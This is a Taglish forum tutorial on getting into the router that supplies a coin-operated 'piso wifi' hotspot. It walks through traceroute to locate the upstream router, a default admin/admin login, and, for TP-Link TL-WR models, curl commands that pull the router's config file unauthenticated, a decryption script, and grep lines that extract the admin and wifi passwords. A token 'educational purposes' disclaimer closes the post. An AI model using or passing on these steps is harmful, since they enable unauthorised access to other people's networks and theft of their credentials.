What's new

Tutorial How to häçk wifi na naka connect sa piso wifi (No firewall enabled only).

NzD4rkS3c

Grasshopper
Joined
Apr 27, 2024
Posts
9
Reaction
23
Points
9
In this thread ituturo ko sainyo kung paano ihäçk ung wifi na nagproprovide ng internet sa piso wifi.
so una..

1.
install termux app: You do not have permission to view the full content of this post. Log in or register now.
o kung may laptap ka install WSL tas ubuntu or kali linux.

2.
install tools:

apt install nmap traceroute curl -y

3. check if may firewall ba:

traceroute -m 5 google.com

pag walang firewall parang ganto lalabas:
traceroute to google.com (172.217.26.78), 5 hops max, 60 byte packets
1 10.0.0.1 (10.0.0.1) 1.520 ms 1.864 ms 1.534 ms
2 192.168.0.1 (192.168.0.1) 1.435 ms 1.590 ms 1.229 ms
3 192.168.50.1 (192.168.50.1) 63.771 ms 65.695 ms 62.686 ms
4 EXAMPLE.180 (EXAMPLE) 63.286 ms 62.938 ms 60.872 ms
5 EXAMPLE.static.pldt.net (EXAMPLE) 112.608 ms 91.815 ms 111.253 ms
NOTE: Magkakaiba tayo ng IPs so.. don't expect na ganyan din yung lalabas sainyo..

tas pag merong firewall:
traceroute to google.com (172.217.26.78), 5 hops max, 60 byte packets
1 10.0.0.1 (10.0.0.1) 1.520 ms 1.864 ms 1.534 ms
2 *
3 *
4 *
5 *

RED -> IP ng router/wifi or IP ng tower na naglilink ng connections.
GREEN -> PUBLIC IP (fiber tower)
BLUE -> INTERNET PROVIDER

4. Ilagay sa browser yung nakared na IP tas itry ilogin yung admin/admin na username at password..

5. Hanapin ang password ng wifi. at kommonek.




BONUS:

if TP-LINK ung router Model: TL-WRxxxx

1.
check if tplink:

curl http://IP_NG_ROUTER | grep "TL-WR"
pag may lumabas na modelName="TL-WRxxxxx" then TPlink.


2. Pull off yung configuration file ng router:

curl http://IP_NG_ROUTER/cgi/conf.bin -H 'Referer: http://IP_NG_ROUTER' -o config.bin

3. Decrypt ung config file ng router
apt install python -y; pip3 install pycryptodome
wget You do not have permission to view the full content of this post. Log in or register now.
python3 decrypt.py config.bin conf.xml

4. Extract ung admin panel password
# admin panel password:
cat conf.xml | grep -e AdminName -e AdminPwd

# Wireless wifi password:
cat conf.xml | grep "hared val="
and done. you can now connect.

HAPPY häçkING!


DISCLAIMER: I AM (NZD4RKS3C) IS NOT RESPONSIBLE FOR ANY îllégâl ACTIVITIES THAT YOU MIGHT COMMIT AFTER READING THIS SHIT. WELL THIS IS FOR EDUCATIONAL PURPOSES ONLY AND JUST TO MAKE YOU AWARE OF THE POSSIBLE WAYS OF GETTING häçkED.
 
Last edited:
Bat ganito po



Screenshot_20240501-014248.jpg
 

Attachments

Similar threads

Users search this thread by keywords

  1. Piso wifi häçk
  2. Piso wifi
  3. Pldt häçk
  4. pldt fiber häçk
  5. How to connect wifi
  6. red fiber häçk
  7. Pldt wifi
  8. PLDT config
  9. häçked wifi password
  10. Bypass wifi
  11. Termux wifi
Back
Top